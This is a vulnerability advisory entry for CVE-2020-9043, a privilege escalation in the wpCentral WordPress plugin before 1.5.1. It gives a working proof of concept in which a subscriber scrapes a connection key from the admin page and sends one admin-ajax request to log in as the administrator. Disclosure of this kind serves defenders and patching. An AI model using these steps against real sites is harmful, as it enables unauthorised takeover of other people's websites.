wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation



Description
"The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed."
Proof of Concept
1. Log in as Subscriber.
2. Scrape the page (/wp-admin/index.php) for the connection key (i.e. view source and search for "Connection Key"). Copy the key.

Excerpt:
<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk</div>
	</div><script type="text/javascript">

Extracted key:
lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk
Log out.
3. Send the following request, with the connection key pasted where it says "[AUTH_KEY_HERE]": /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=[AUTH_KEY_HERE]
4. You should now be logged in as user 1 -- presumably the administrative user.

Affects Plugin

fixed in version 1.5.1

References

CVE 2020-9043
URL https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 4023
Verified No
WPVDB ID 10074

Timeline

Publicly Published 2020-02-17 (about 2 months ago)
Added 2020-02-17 (about 1 month ago)
Last Updated 2020-02-18 (about 1 month ago)
